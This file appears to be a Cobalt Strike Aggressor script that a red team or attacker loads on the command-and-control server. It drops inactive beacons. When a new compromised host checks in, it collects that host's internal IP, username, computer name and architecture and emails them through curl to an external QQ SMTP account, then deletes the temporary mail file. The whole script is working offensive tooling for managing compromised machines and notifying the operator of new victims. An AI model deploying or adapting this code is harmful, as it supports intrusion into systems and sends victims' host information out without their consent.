auxiliary.cna

#auxiliary modules functions


#Config
$From = "1510536500@qq.com";
$To = "1510536500@qq.com";
$UserName = "1510536500@qq.com";
$Password = "xxxxx";#Mailbox Third Party Authorization Code, Not Mailbox Password!
$Switch = "off";
#Config

on heartbeat_5s {
	local('$entry');
	foreach $entry (beacons()) {
		if($entry['last'] > 75000 || (($entry['alive']) eq "false")){
           beacon_remove($entry['id']);
           action("\c4Beacon ".$entry['id']." has gone offline !");
        }
	}
}

on beacon_initial {
    bsleep($1, 30, 30);
    bnote($1, "Bid: ".beacon_info($1, "id")."  NT: ".beacon_info($1,"ver"));
    if ($Switch eq "on"){
        action("\c9Sending Mail......");
        local('$Ip $User $ComName $Arch $Handle $Mail_content');
        $IP = beacon_info($1, "internal");
        $User = beacon_info($1, "user");
        $ComName = beacon_info($1, "computer");
        $Arch = beacon_info($1, "barch");
        $Mail_content = "From:".$From."\r\nTo:".$To."\r\nSubject:CobaltStriker\r\n\r\nIP:".$IP."\r\nUser:".$User."\r\nComputerName:".$ComName."\r\nArch:".$Arch;
        $Handle = openf(">mail.txt");
        writeb($Handle, $Mail_content); 
        closef($Handle);
        @Curl_command = @('curl', '-s' ,'--url','smtp://smtp.qq.com', '--mail-from', $From, '--mail-rcpt', $To, '--upload-file','mail.txt', '--user', $UserName.':'.$Password);
        exec(@Curl_command);
        exec("cmd.exe /C del /F mail.txt");
        action("\c9Send Done: ".$ComName."!");
    }    
}